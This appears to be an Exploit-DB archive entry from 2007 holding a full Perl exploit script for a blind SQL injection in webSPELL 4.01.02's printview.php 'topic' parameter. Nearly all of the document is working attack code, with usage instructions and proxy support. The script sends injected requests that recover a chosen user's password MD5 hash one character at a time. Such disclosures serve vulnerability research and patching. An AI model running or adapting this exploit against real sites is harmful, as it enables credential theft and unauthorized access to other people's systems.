webSPELL 4.01.02 - 'topic' SQL Injection

EDB-ID:

3351


Author:

DNX

Type:

webapps


Platform:

PHP

Date:

2007-02-21


#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
  print "\n                           \\#'#/                       ";
  print "\n                           (-.-)                        ";
  print "\n   -------------------oOO---(_)---OOo-------------------";
  print "\n   | webSPELL <= v4.01.02 (topic) Remote SQL Injection |";
  print "\n   |                   coded by DNX                    |";
  print "\n   -----------------------------------------------------";
  print "\n[!] Bug: in printview.php line 61, inject sql code in \$topic";
  print "\n[!] Solution: install security fix";
  print "\n[!] Usage: perl ws.pl [Host] [Path] [Topic] <Options>";
  print "\n[!] Example: perl ws.pl 127.0.0.1 /webspell/ -tid 1 -uid 2 -t my_user";
  print "\n[!] Options:";
  print "\n       -tid [no]     Valid topic-ID";
  print "\n       -uid [no]     User-ID, default is 1";
  print "\n       -t [name]     Changed the user table name, default is webs_user";
  print "\n       -p [ip:port]  Proxy support";
  print "\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $user    = 1;
my $table   = "webs_user";
my $topic   = 0;
my %options = ();
GetOptions(\%options, "tid=i", "uid=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"tid"})
{
  $topic = $options{"tid"};
}
else
{
  print "[!] Exploit failed, missing parameter\n";
  exit;
}

if($options{"uid"})
{
  $user = $options{"uid"};
}

if($options{"t"})
{
  $table = $options{"t"};
}

syswrite(STDOUT, "[!] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $found = 0;
  my $h = 48;
  while(!$found && $h <= 57)
  {
    if(istrue3($host, $path, $table, $topic, $user, $i, $h))
    {
      $found = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$found)
  {
    $h = 97;
    while(!$found && $h <= 122)
    {
      if(istrue3($host, $path, $table, $topic, $user, $i, $h))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[!] Exploit done\n";

sub istrue3
{
  my $host  = shift;
  my $path  = shift;
  my $table = shift;
  my $tid   = shift;
  my $uid   = shift;
  my $i     = shift;
  my $h     = shift;
  
  my $ua = LWP::UserAgent->new;
  my $url = "http://".$host.$path."printview.php?board=1&topic=".$tid."'%20AND%20SUBSTRING((SELECT%20password%20FROM%20".$table."%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")/*";
  
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
  
  my $response = $ua->get($url);
  my $content = $response->content;
  my $regexp = "<b>Main Board</b>";
  
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

# milw0rm.com [2007-02-21]